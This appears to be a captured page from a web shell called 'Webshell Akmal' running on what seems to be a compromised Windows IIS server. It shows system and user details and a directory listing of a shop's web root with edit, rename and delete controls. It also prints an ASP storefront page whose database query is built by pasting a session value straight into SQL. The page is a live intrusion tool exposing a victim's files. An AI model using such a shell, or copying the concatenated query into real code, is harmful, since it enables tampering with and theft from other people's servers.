Webshell Akmal archtte id
System:
Microsoft Windows NT 10.0.20348.0
Server:
Microsoft-IIS/10.0
User:
buyyou
Directory:
C:
\
MyData
\
WWW
\
asc365
\
Name
Size
Type
Actions
17Track
-
Directory
Rename
Delete
ASC365_CANADA
-
Directory
Rename
Delete
ASC365_Store01
-
Directory
Rename
Delete
aspnet_client
-
Directory
Rename
Delete
CompanyImage
-
Directory
Rename
Delete
TJGS_USA
-
Directory
Rename
Delete
zhijian
-
Directory
Rename
Delete
17Track.rar
7125448 bytes
.rar
Edit
Rename
Delete
Memo.inc
0 bytes
.inc
Edit
Rename
Delete
web.config
213 bytes
.config
Edit
Rename
Delete
<%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%> <!--#include file="conn.asp" --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <link rel="stylesheet" href="css/style.css" type="text/css" media="screen" /> <title></title> <style type="text/css"> <!-- .STYLE1 { font-family: Verdana, Arial, Helvetica, sans-serif; } a{ position:relative; text-decoration:none; color:#666666; } a:hover{ position:relative; text-decoration:underline; } --> </style> <script> function cls(){ //�����¼��Ķ�������Ϊ��������Ĭ�϶��� with(event.srcElement) //�����ǰֵΪĬ��ֵ������� if(value==defaultValue) value="" } function res(){ //�����¼��Ķ�������Ϊ��������Ĭ�϶��� with(event.srcElement) //�����ǰֵΪ�գ�������ΪĬ��ֵ if(value=="") value=defaultValue } </script> </head> <body style="width:1000px; margin:auto"> <table style="width:1000px; height:50px;margin:auto; background-color:#FFFFFF; border:0;" cellpadding="0" cellspacing="0"> <tr> <td width="1000" height="150"> <table border="0" cellpadding="0" cellspacing="0" > <tr> <td height="110" ><img src="image/head5.jpg" width="1000" border="0"/></td> </tr> <% newtypeid=Session("typeid") if newtypeid>0 then set rst=server.CreateObject("adodb.recordset") sqlt="select * from menu1 where id="&newtypeid&"" rst.open sqlt,conn,1,1 parentpath=rst("ParentPath") if len(parentpath)>1 then temp=split(parentpath,",") newtypeid=temp(1) end if end if %> <tr> <td> <table align="right" width="740" border="0" cellpadding="0" cellspacing="0"> <tr> <form method="post" name="search" action="SearchProduct.asp?action=search"> <td width="444" height="38" valign="top"> <div style="text-align:right"> <% set rs=server.CreateObject("adodb.recordset") sql="select * from menu1 where cid=0" rs.open sql,conn,1,1 %> <input type="text" style="width:440px; height:30px;border:#D5D5D5 1px solid;" name="searchtext" value="Search...." onfocus="cls()" onblur="res()"/> </div> </td> <td width="182" valign="top"><select name="typeid" style="height:35px; width:180px"> <option value="0" >All Categories</option> <% do while not rs.eof if rs("id")=Cint(newtypeid) then %> <option value="<%=rs("id")%>" selected="selected"><%=rs("CName")%></option> <% else %> <option value="<%=rs("id")%>" ><%=rs("CName")%></option> <% end if rs.movenext loop %> </select></td> <td width="114" valign="top" align="left"><input type="image" src="image/search.jpg" style="height:35px"/></td> </form> </tr> </table> </td> </tr> </table></td> </tr> </table> </body> </html>